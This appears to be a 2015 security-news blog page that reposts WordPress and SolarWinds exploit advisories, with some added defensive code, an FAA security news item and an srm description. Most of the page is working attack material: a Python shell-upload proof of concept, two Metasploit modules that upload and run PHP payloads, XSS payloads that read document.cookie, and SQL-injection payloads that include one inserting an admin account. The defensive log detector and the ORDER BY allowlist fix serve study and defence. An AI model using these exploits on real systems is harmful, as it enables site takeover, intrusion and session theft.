MondoUnix

5 Mar 2015

WordPress WP All 3.2.3 Shell Upload

------------------------------------------------------------------------------
WordPress WP All Import Plugin RCE
------------------------------------------------------------------------------
 
[-] Vulnerability Author:
 
James Golovich ( @Pritect )
 
[-] Exploit Author
 
Evex ( @Evex_1337 )
 
[-] Plugin Link:
 
https://wordpress.org/plugins/wp-all-import/
 
[-] Affected Version:
 
Version <= 3.2.3
 
 
[-] Vulnerability Description:
 
 
    Retrieve any file on the system that ends in .txt
    Retrieve any file on the system that ends in .html
    Retrieve any value from the postmeta table
    Upload arbitrary files to system
 
 
Reference:
http://www.pritect.net/blog/wp-all-import-3-2-3-pro-4-0-3-vulnerability-breakdown
 
 
[-] Proof of Concept:
 
# Requirements: php and python with the requests library installed
# https://pypi.python.org/pypi/requests
import requests,os
site="localhost/x/wordpress"
file_to_upload = 'evex.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read(),timeout=20)
# the plugin names the upload directory md5(strtotime(<request time>)); the server's Date header supplies that time
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print "http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/evil.php"


5 Mar 2015

WordPress Photocrati Theme 4.x.x SQL Injection

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
 
 
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
 
An attacker can perform a remote SQL injection via the site URL to obtain sensitive information.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
 
greetz to all muslims
:) from morocco


5 Mar 2015

WordPress Media Cleaner 2.2.6 Cross Site Scripting

# Exploit Title: Wordpress Media Cleaner - XSS
# Author: İsmail SAYGILI
# Web Site: www.ismailsaygili.com.tr
# E-Mail: iletisim@ismailsaygili.com.tr
# Date: 2015-02-26
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip
# Version: 2.2.6
 
 
# Vulnerable File(s):
                [+] wp-media-cleaner.php
 
# Vulnerable Code(s):
        [+] 647. Line
          $view = $_GET['view'] : "issues"; 
        [+] 648. Line  
          $paged = $_GET['paged'] : 1;
        [+] 653. Line
          $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;
 
# Request Method(s):
                [+] GET
 
# Vulnerable Parameter(s):
                [+] view, paged, s
 
 
 
# Proof of Concept
 
--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}
 
--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)>


5 Mar 2015

WordPress Holding Pattern Theme Arbitrary File Upload

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'socket'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'     => %q{
          This module exploits a file upload vulnerability in all versions of the
          Holding Pattern theme found in the upload_file.php script which contains
          no session or file validation. It allows unauthenticated users to upload
          files of any type and subsequently execute PHP scripts in the context of
          the web server.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Alexander Borg',                 # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2015-1172'],
          ['WPVDB', '7784'],
          ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
        ],
      'DisclosureDate'  => 'Feb 11 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['holding_pattern', {}]],
      'DefaultTarget'   => 0
    ))
  end
 
  def rhost
    datastore['RHOST']
  end
 
  def holding_pattern_uploads_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
  end
 
  def holding_pattern_uploader_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
  end
 
  def generate_mime_message(payload, payload_name)
    data = Rex::MIME::Message.new
    target_ip = IPSocket.getaddress(rhost)
    field_name = Rex::Text.md5(target_ip)
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
    data
  end
 
  def exploit
    print_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
    data = generate_mime_message(payload, payload_name)
 
    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => holding_pattern_uploader_url,
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => data.to_s
    )
    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
    payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
 
    print_status("#{peer} - Executing the payload at #{payload_url}")
    register_files_for_cleanup(payload_name)
    send_request_cgi({ 'uri' => payload_url, 'method'  => 'GET' }, 5)
  end
end
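Both write-ups above (the WP All Import PoC and the Holding Pattern module) leave a recognisable trail in the web server's access log: a POST to an upload endpoint that needs no authentication, followed by a GET of a .php file from the upload directory. The following detection script is an added example, not code from either advisory or from Metasploit; the log lines are constructed, and the endpoint and directory paths are the ones the two exploits use.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample access-log lines (combined log format); none are from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Mar/2015:10:12:01 +0000] "GET /wp-content/uploads/2015/03/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Mar/2015:10:12:07 +0000] "POST /wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php HTTP/1.1" 200 12 "-" "python-requests/2.5.1"
203.0.113.9 - - [05/Mar/2015:10:12:08 +0000] "GET /wp-content/uploads/wpallimport/uploads/3f6c0d1e2b9a4c5d6e7f8091a2b3c4d5/evil.php HTTP/1.1" 200 88 "-" "python-requests/2.5.1"
198.51.100.7 - - [05/Mar/2015:10:15:42 +0000] "POST /wp-content/themes/holding_pattern/admin/upload-file.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Mar/2015:10:15:43 +0000] "GET /wp-content/themes/holding_pattern/uploads/kqzpwxnbta.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.3 - - [05/Mar/2015:10:20:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 44 "-" "Mozilla/5.0"
"""

# Pull client IP, timestamp, method, request path and status out of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# (rule name, required method or None, path pattern). Paths come from the two write-ups: WP All
# Import's admin-ajax upload action and 32-hex-char upload dir, Holding Pattern's upload-file.php and uploads/.
RULES = [
    ("wp-all-import-upload-request", "POST", re.compile(
        r"^/wp-admin/admin-ajax\.php\?(?=.*\bpage=pmxi-admin-settings\b)(?=.*\baction=upload\b)")),
    ("wp-all-import-php-fetched", None, re.compile(
        r"^/wp-content/uploads/wpallimport/uploads/[0-9a-f]{32}/[^/?]+\.php(?:$|\?)")),
    ("holding-pattern-upload-request", "POST", re.compile(
        r"^/wp-content/themes/holding_pattern/admin/upload-file\.php(?:$|\?)")),
    ("holding-pattern-php-fetched", None, re.compile(
        r"^/wp-content/themes/holding_pattern/uploads/[^/?]+\.php(?:$|\?)")),
]

@dataclass
class Alert:
    rule: str
    ip: str
    ts: str
    method: str
    path: str
    status: int

def scan_log(text: str) -> List[Alert]:
    """One Alert per log line that matches a rule; the first matching rule wins."""
    alerts: List[Alert] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        method, path = m.group("method"), m.group("path")
        for name, want_method, pattern in RULES:
            if want_method is not None and method != want_method:
                continue
            if pattern.search(path):
                alerts.append(Alert(name, m.group("ip"), m.group("ts"),
                                    method, path, int(m.group("status"))))
                break
    return alerts

def upload_then_execute(alerts: List[Alert]) -> List[str]:
    """IPs that sent an upload request and later fetched a .php file from the matching
    upload directory with HTTP 200: the strongest sign that the dropped file is live."""
    hits: List[str] = []
    for a in alerts:
        if not a.rule.endswith("-upload-request"):
            continue
        fetched = a.rule[: -len("-upload-request")] + "-php-fetched"
        if any(b.ip == a.ip and b.rule == fetched and b.status == 200 for b in alerts):
            if a.ip not in hits:
                hits.append(a.ip)
    return hits

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), upload_then_execute(scan_log(SAMPLE_LOG)), sep="\n")
```

A 200 on the PHP fetch is what separates a probe from a working web shell; a 404 on the same path still deserves a look at the preceding POST.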


5 Mar 2015

WordPress Admin Shell Upload

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress providing valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'DisclosureDate'  => 'Feb 21 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['WordPress', {}]],
      'DefaultTarget'   => 0
    ))
 
    register_options(
      [
        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
      ], self.class)
  end
 
  def username
    datastore['USERNAME']
  end
 
  def password
    datastore['PASSWORD']
  end
 
  def generate_plugin(plugin_name, payload_name)
    plugin_script = %Q{<?php
/**
 * Plugin Name: #{plugin_name}
 * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
 * Author: #{Rex::Text.rand_text_alpha(10)}
 * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
 * License: GPL2
 */
?>}
 
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
    zip
  end
 
  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
 
    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
    print_good("#{peer} - Authenticated with WordPress")
 
    print_status("#{peer} - Preparing payload...")
    plugin_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
    zip = generate_plugin(plugin_name, payload_name)
 
    print_status("#{peer} - Uploading payload...")
    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
 
    print_status("#{peer} - Executing the payload at #{payload_uri}...")
    register_files_for_cleanup("#{payload_name}.php")
    register_files_for_cleanup("#{plugin_name}.php")
    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
  end
end


5 Mar 2015

Cross Site Tracer Script

#!/usr/bin/python
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#
 
import socket
import time
import sys, getopt
 
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
 
def main(argv):
  argc = len(argv)
 
  if argc <= 2:
    print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC
    print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC
    print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC
    sys.exit(0)
 
  target = argv[1] # SET TARGET
  port = argv[2] # SET PORT
 
  buffer1 = "TRACE / HTTP/1.1"
  buffer2 = "Test: <script>alert(1);</script>"
  buffer3 = "Host: " + target
 
  print ""
  print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 "
  print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com"
  print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port 
 
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  result=s.connect_ex((target,int(port)))
  s.settimeout(1.0)
 
  if result == 0:
    s.send(buffer1 + "\n")
    s.send(buffer2 + "\n")
    s.send(buffer3 + "\n\n")
    data = s.recv(1024)
    script = "alert"
    if script.lower() in data.lower():
      print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC
      print ""
      print bcolors.WARNING + data + bcolors.ENDC
    else:
      print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!"
      print ""
      print ""
 
  else:
    print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC
 
  s.close()
 
main(sys.argv)


5 Mar 2015

US air traffic control computer system vulnerable to terrorist hackers

The US system for guiding airplanes is open to vulnerabilities from outside hackers, the Government Accountability Office said Monday. The weaknesses that threaten the Federal Aviation Administration's ability to ensure the safety of flights include the failure to patch known three-year-old security holes, the transmission and storage of unencrypted passwords, and the continued use of "end-of-life" key servers.

The GAO said that deficiencies in the system that monitors some 2,850 flights at a time has positioned the air traffic system into an "increased and unnecessary risk of unauthorized access, use or modification that could disrupt air traffic control operations." What's more, the report said the FAA "did not always ensure that sensitive data were encrypted when transmitted or stored." That information included stored passwords and "authentication data."

Among the findings:

While the Federal Aviation Administration (FAA) has taken steps to protect its air traffic control systems from cyber-based and other threats, significant security control weaknesses remain, threatening the agency's ability to ensure the safe and uninterrupted operation of the national airspace system (NAS). These include weaknesses in controls intended to prevent, limit, and detect unauthorized access to computer resources, such as controls for protecting system boundaries, identifying and authenticating users, authorizing users to access systems, encrypting sensitive data, and auditing and monitoring activity on FAA's systems. Additionally, shortcomings in boundary protection controls between less-secure systems and the operational NAS environment increase the risk from these weaknesses.

The flying public's safety is in jeopardy until there's a fix to the system used at some 500 airport control towers, the GAO said. (PDF)

"Until FAA effectively implements security controls, establishes stronger agency-wide information security risk management processes ... the weaknesses GAO identified are likely to continue, placing the safe and uninterrupted operation of the nation's air traffic control system at increased and unnecessary risk."

The report chided the agency for failing to perform basic functions:

Additionally, the agency did not always ensure that security patches were applied in a timely manner to servers and network devices supporting air traffic control systems, or that servers were using software that was up-to-date. For example, certain systems were missing patches dating back more than 3 years. Additionally, certain key servers had reached end-of-life and were no longer supported by the vendor. As a result, FAA is at an increased risk that unpatched vulnerabilities could allow its information and information systems to be compromised.

Senators immediately demanded an explanation from the Transportation Department, which oversees the FAA.

"These vulnerabilities have the potential to compromise the safety and efficiency of the national airspace system, which the traveling public relies on each and every day," said John Thune (R-S.D.) and Bill Nelson (D-Fla.).

The transportation agency said it was working to correct the problems and has achieved "major milestones" toward that goal.

Source: http://arstechnica.com/tech-policy/2015/03/us-air-traffic-control-computer-system-vulnerable-to-terrorist-hackers/

4 Mar 2015

Solarwinds Orion Service SQL Injection

I found a couple of SQL injection vulnerabilities in the core Orion service used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc.). This service provides a consistent configuration and authentication layer across the products.
 
To be exact, the vulnerable applications and versions are:
 
Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2
 
At first glance, the injections are only available to admins, as the requests used are on the Manage Accounts page. However, it seems there is no real ACL check on the GetAccounts and GetAccountGroups endpoints of the AccountManagement.asmx service, which means that even authenticating as Guest allows for exploitation. By default, the Guest account has no password and is enabled.
 
On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and 'dir' parameters are susceptible to boolean-/time-based, and stacked injections. By capturing the AJAX requests made by an admin user to these endpoints, authenticating as Guest and replacing the admin cookie with the Guest cookie, you can still make a successful request, and thus a successful exploitation vector for any authenticated user.
 
Being a stacked injection, this becomes a privilege escalation at the very least, as an attacker is able to insert their own admin user. A pull request for a Metasploit module which should achieve this on any product using the Orion service as the core authentication management system, using the GetAccounts endpoint, has been made (https://github.com/rapid7/metasploit-framework/pull/4836). By default, the module attempts to authenticate as the Guest user with a blank password, then exploit the SQL injection to insert a new admin with a blank password.
 
I am not sure if the non-trial versions allow you to specify your own SQL server, but the trials install a SQL Server Express instance. The SQL user that the application uses is not an administrator, and the xp_cmd_shell stored procedure is unavailable.
 
Within the GetAccounts endpoint:
 
Parameter: dir (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--
 
 
Parameter: sort (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC
 
 
 
Within the GetAccountGroups endpoint, very similar injection techniques are
available:
 
Parameter: dir (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--
 
 
Parameter: sort (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC
 
 
An example injection to insert an admin user named notadmin with a blank password using the 'dir' parameter would be:
 
ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');
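The root cause in the findings above is that 'sort' and 'dir' are spliced into an ORDER BY clause, and ORDER BY cannot be parameterised the way a value can: identifiers and keywords have to be validated against a fixed set. The following is an added example (not SolarWinds code) of that allowlist fix beside the vulnerable shape, using a constructed in-memory SQLite stand-in for the Accounts table; only AccountID and GroupPriority appear in the write-up, the other column is assumed.

```python
import sqlite3
from typing import Dict, List, Tuple

# Sort keys the client may send, mapped to the real column. The identifier that reaches
# SQL is always the right-hand side, never the request value. (Constructed stand-in
# table: only AccountID and GroupPriority are named in the write-up.)
SORT_COLUMNS: Dict[str, str] = {
    "Accounts.AccountID": "AccountID",
    "Accounts.AccountEnabled": "AccountEnabled",
    "Accounts.GroupPriority": "GroupPriority",
}
SORT_DIRECTIONS = {"ASC", "DESC"}

def order_by_unsafe(sort: str, direction: str) -> str:
    """The vulnerable shape: request parameters concatenated into ORDER BY. A 'dir' of
    "ASC; WAITFOR DELAY '0:0:5'--" becomes a second statement on SQL Server."""
    return f"SELECT AccountID, AccountEnabled, GroupPriority FROM Accounts ORDER BY {sort} {direction}"

def order_by_safe(sort: str, direction: str) -> str:
    """Allowlist both parameters; anything outside the fixed sets is refused before
    any SQL text is built."""
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError(f"unsupported sort column: {sort!r}")
    direction = direction.strip().upper()
    if direction not in SORT_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    return f"SELECT AccountID, AccountEnabled, GroupPriority FROM Accounts ORDER BY {column} {direction}"

def is_rejected(sort: str, direction: str) -> bool:
    """True if the hardened builder refuses this (sort, dir) pair."""
    try:
        order_by_safe(sort, direction)
    except ValueError:
        return True
    return False

def demo_conn() -> sqlite3.Connection:
    """Constructed in-memory Accounts table; rows and values are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts (AccountID TEXT, AccountEnabled TEXT, GroupPriority INTEGER)")
    conn.executemany("INSERT INTO Accounts VALUES (?, ?, ?)",
                     [("Admin", "Y", 1), ("Guest", "Y", 8), ("ops", "Y", 4)])
    return conn

def fetch_sorted(conn: sqlite3.Connection, sort: str, direction: str) -> List[Tuple]:
    """Only the validated query ever reaches the database."""
    return conn.execute(order_by_safe(sort, direction)).fetchall()

# Payload shapes quoted in the write-up: a stacked query and a subselect in ORDER BY.
STACKED_DIR = "ASC; WAITFOR DELAY '0:0:5'--"
SUBSELECT_DIR = "ASC,(SELECT (CASE WHEN (5791=5791) THEN 'ASC' ELSE 1 END))"

if __name__ == "__main__":
    print(order_by_unsafe("Accounts.AccountID", STACKED_DIR))  # payload reaches the DB as-is
    for p in (STACKED_DIR, SUBSELECT_DIR):
        print(repr(p), "->", "rejected" if is_rejected("Accounts.AccountID", p) else "ACCEPTED")
    print(fetch_sorted(demo_conn(), "Accounts.GroupPriority", "desc"))
```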
 
This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock, Group Product Manager – Network Management at Solarwinds for the easy coordination (you should still have a bug bounty though!).
 
i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?
 
i dub thee Molarfriends vulnerability. wheres my markketing tem...
 
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website


27 Feb 2015

srm – secure file deletion for posix systems

srm is a secure replacement for rm(1). Unlike the standard rm, it overwrites the data in the target files before unlinking them.
This prevents command-line recovery of the data by examining the raw block device.
It may also help frustrate physical examination of the disk, although it's unlikely that it can completely prevent that type of recovery.
It is, essentially, a paper shredder for sensitive files.

srm is ideal for personal computers or workstations with Internet connections.
It can help prevent malicious users from breaking in and undeleting personal files, such as old emails.
Because it uses the exact same options as rm(1), srm is simple to use.
Just substitute it for rm whenever you want to destroy files, rather than just unlinking them.
For more information on using srm, read the manual page srm(1).
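The overwrite-before-unlink idea srm implements, shown as an added Python illustration (this is not srm's source): each pass rewrites the file's current blocks and forces them to the device with fsync before the name is removed. It carries the same caveat as the description above: on journaling, copy-on-write or wear-levelling storage, earlier copies of the data can survive outside the blocks the file currently occupies, so overwriting the file is not the same as overwriting the disk.

```python
import os
import secrets
import stat
import tempfile

CHUNK = 64 * 1024

def _overwrite(fd: int, size: int, pattern) -> None:
    """One pass: write `size` bytes of `pattern` (a byte to repeat, or None for random
    data) from offset 0, then fsync so the pass is not coalesced away in the page cache."""
    os.lseek(fd, 0, os.SEEK_SET)
    remaining = size
    while remaining > 0:
        n = min(remaining, CHUNK)
        buf = secrets.token_bytes(n) if pattern is None else pattern * n
        remaining -= os.write(fd, buf)  # handle short writes by looping on the count written
    os.fsync(fd)

def secure_delete(path: str, passes=(b"\x00", b"\xff", None)) -> int:
    """Overwrite a regular file with each pattern in `passes`, truncate it, then unlink it.
    Returns the number of bytes overwritten per pass. Symlinks and non-regular files are
    refused so a planted link cannot redirect the overwrite onto another file."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        raise ValueError(f"{path!r} is not a regular file")
    fd = os.open(path, os.O_WRONLY | getattr(os, "O_NOFOLLOW", 0))
    try:
        size = os.fstat(fd).st_size
        for pattern in passes:
            _overwrite(fd, size, pattern)
        os.ftruncate(fd, 0)  # hide the original length as well as the contents
        os.fsync(fd)
    finally:
        os.close(fd)
    os.unlink(path)
    return size

def demo() -> tuple:
    """Create a throwaway file, shred it, and report (whole file overwritten?, still exists?)."""
    payload = b"old email we do not want recoverable\n" * 1000  # constructed content
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(payload)
    written = secure_delete(path)
    return written == len(payload), os.path.exists(path)

if __name__ == "__main__":
    print(demo())
```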
Download

The latest version of srm can always be found on the SourceForge project page which has the source code and binaries for Windows.
In addition to the files on SourceForge, other people have added prepackaged versions to the FreeBSD ports collection and Debian.

New releases can be tracked via the SourceForge account.
They're also announced on free(code) whenever a new stable version is released.

Source: http://srm.sourceforge.net/

26 Feb 2015

WordPress ADPlugg 1.1.33 Cross Site Scripting

=====================================================
Stored XSS Vulnerability in ADPlugg WordPress Plugin
=====================================================
 
.. contents:: Table of Contents
 
Overview
========
 
* Title: Stored XSS Vulnerability in ADPlugg WordPress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/adplugg/
* Severity: Medium
* Version Affected: 1.1.33 and most likely earlier versions
* Version Tested: 1.1.33
* Version Patched: 1.1.34
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Access Code
 
About Vulnerability
-------------------
This plugin is vulnerable to stored cross-site scripting. The Access Code parameter in the AdPlugg settings page, which administrator users can edit, is stored without sanitisation and rendered back unescaped. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.
 
Vulnerability Class
===================     
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
* Goto settings --> AdPlugg
* Put This payload in Access Code "><script>alert(document.cookie)</script>
* Click on Save Changes and you will see the XSS in action
* Reload the page or navigate back to it to confirm that the payload is stored ;)
 
Mitigation 
==========
Update to Version 1.1.34 
 
Change Log
==========
https://wordpress.org/plugins/adplugg/changelog/
 
Disclosure 
==========
18-February-2015 reported to developer
19-February-2015 Developer acknowledged the bug
19-February-2015 Developer patched the bug and pushed an update
21-February-2015 Public disclosure
 
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
